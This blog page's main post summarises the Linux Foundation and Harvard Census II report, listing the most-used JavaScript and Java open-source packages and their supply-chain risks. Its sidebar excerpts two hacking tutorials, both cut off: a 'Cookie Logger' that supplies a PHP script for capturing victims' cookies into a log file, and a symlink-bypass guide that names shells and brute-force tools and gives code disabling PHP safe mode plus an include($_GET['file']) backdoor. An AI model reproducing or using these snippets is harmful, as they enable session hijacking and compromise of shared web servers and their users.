Skip to main content

Most commonly used open-source Software & Security Problems released by Linux Foundation

By
Image result for linux foundation

Linux Foundation and Harvard’s Lab identifies the most commonly used free and open-source software and the potential vulnerabilities associated.
The Census II report determines the “important steps towards understanding and addressing structural and security complexities in the modern-day supply chain where open source is pervasive, but not always understood.”
The report also identifies the commonly used application in production environments and examine them for potential vulnerabilities.
“The Census II report addresses some of the most important questions facing us as we try to understand the complexity and interdependence among open-source software packages and components in the global supply chain,” said Jim Zemlin, executive director at the Linux Foundation.
Starting from Heartbleed security bug, the importance of FOSS is understood than ever before and they are a critical part of a production environment, throughout the supply chain.

Most-Used Packages

  1. Async: A utility module that provides straight-forward, powerful functions for working with asynchronous JavaScript. Although originally designed for use with Node.js and installable via npm install async, it can also be used directly in the browser.
  2. Inherits: A browser-friendly inheritance fully compatible with standard node.js inherits.
  3. Isarray: Array#isArray for older browsers and deprecated Node.js versions.
  4. Kind-of: Get the native JavaScript type of value.
  5. Lodash: A modern JavaScript utility library delivering modularity, performance & extras.
  6. Minimist: Parse argument options. This module is the guts of optimist’s argument parser without all the fanciful decoration.
  7. Natives: Do stuff with Node.js’s native JavaScript modules.
  8. Qs: A querystring parsing and stringifying library with some added security.
  9. Readable-stream: Node.js core streams for userland.
  10. String_decoder: Node-core string_decoder for userland.

Most-Used Non-JavaScript Packages

  • com.fasterxml.jackson.core:jackson-core: A core part of Jackson that defines Streaming API as well as basic shared abstractions.
  • com.fasterxml.jackson.core:jackson-databind: General data-binding package for Jackson (2.x): works on streaming API (core) implementation(s).
  • com.google.guava:guava: Google core libraries for Java.
  • commons-codec: Apache Commons Codec software provides implementations of common encoders and decoders such as Base64, Hex, Phonetic and URLs
  • commons-io: Commons IO is a library of utilities to assist with developing IO functionality.
  • httpcomponents-client: The Apache HttpComponents™ project is responsible for creating and maintaining a toolset of low level Java components focused on HTTP and associated protocols.
  • httpcomponents-core: The Apache HttpComponents™ project is responsible for creating and maintaining a toolset of low level Java components focused on HTTP and associated protocols.
  • logback-core: The reliable, generic, fast and flexible logging framework for Java.
  • org.apache.commons:commons-lang3: A package of Java utility classes for the classes that are in java.lang’s hierarchy, or are considered to be so standard as to justify existence in java.lang.
  • Slf4j:slf4j: Simple Logging Facade for Java.
With FOSS constituting 80-90 percent of all software, it is more important than ever that we understand what FOSS is most used and where it could be vulnerable to attack, reads the report.

Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

By
Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo
Post a Comment
Read more